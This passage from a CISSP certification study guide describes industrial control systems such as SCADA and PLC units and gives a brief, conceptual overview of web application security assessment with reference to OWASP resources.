360
Chapter 9
■
Security Vulnerabilities, Threats, and Countermeasures
PLC units are effectively single-purpose or focused-purpose digital computers. They are
typically deployed for the management and automation of various industrial electrome-
chanical operations, such as controlling systems on an assembly line or a large-scale digital
light display (such as a giant display system in a stadium or on a Las Vegas Strip marquee).
A SCADA system can operate as a stand-alone device,
be networked together with
other SCADA systems, or be networked with traditional information technology (IT)
systems. Most SCADA systems are designed with minimal human interfaces. Often, they
use mechanical buttons and knobs or simple LCD screen interfaces (similar to what you
might have on a business printer or a GPS navigation device). However, networked SCADA
devices may have more complex remote-control software interfaces.
In theory, the static design of SCADA, PLC, and DCS units and their minimal human
interfaces should make the system fairly resistant to compromise or modification. Thus,
little security was built into these industrial control devices, especially in the past. But there
have been several well-known compromises of industrial control systems in recent years; for
example, Stuxnet delivered the first-ever rootkit to a SCADA
system located in a nuclear
facility. Many SCADA vendors have started implementing security improvements into their
solutions in order to prevent or at least reduce future compromises. However, in practice,
SCADA and ICS systems are still often poorly secured, vulnerable, and infrequently
updated, and older versions not designed for security are still in widespread use.
Assess and Mitigate Vulnerabilities
in Web-Based Systems
There is a wide variety of application and system vulnerabilities and threats in web-based
systems, and the range is constantly expanding. Vulnerabilities include concerns related to
Extensible Markup Language (XML) and Security Association Markup Language (SAML)
plus many other concerns discussed by the open community-focused
web project known as
the
Open Web Application Security Project (OWASP)
.
OWASP is a nonprofit security project focusing on improving security for online or
web-based applications. OWASP is not just an organization—it is also a large community
that works together to freely share information, methodology, tools, and techniques related
to better coding practices and more secure deployment architectures. For more informa-
tion on OWASP and to participate in the community, visit
www.owasp.org
.
The OWASP
group maintains a guide of recommendations for assessing the security of a web service at
https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet
.
OWASP also maintains a top ten list of the most critical web application attacks at
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf
. Both of
these documents would be a reasonable starting point for planning a security evaluation or
penetration test of an organization’s web services.
Any security evaluation should start off with reconnaissance or information gathering.
This step is to collect as much information as possible about the target for later steps to use.
This usually includes viewing each of the hosted web pages, discovering the automation
Assess and Mitigate Vulnerabilities in Web-Based Systems
361
technologies in use, looking for information that should not have been posted,
and check-
ing for configuration and security leaks. This is followed by an assessment of the site’s
configuration management (such as file handling, extensions in use, backups, looking for
sensitive data in client-side code), and evaluating the site’s transmission security (such as
checking for Secure Sockets Layer (SSL)/Transport Layer Security (TLS) version support,
assessing cipher suites, cookie/session ID/token management, and susceptibility to forged
requests).
Next in a web security assessment is to evaluate authentication and session management.
This is followed by evaluating the cryptography of the site and the methods used for data
validation and sanitization. A web security assessment should
also involve checking for
DoS defenses, evaluating risk responses, and testing error handling.
This is only a brief overview of the concept of web security assessment, as the CISSP
exam does not expect you to be a professional penetration tester, but you should be gener-
ally aware of the concept of security evaluation. You are welcome to explore more details
about web security assessment from the OWASP guide if you find this topic interesting.
A few of the OWASP top ten Web risks that you may want to know about are injection,
XML
exploitation, cross-site scripting (XSS), and XSRF.
An
Do'stlaringiz bilan baham: 
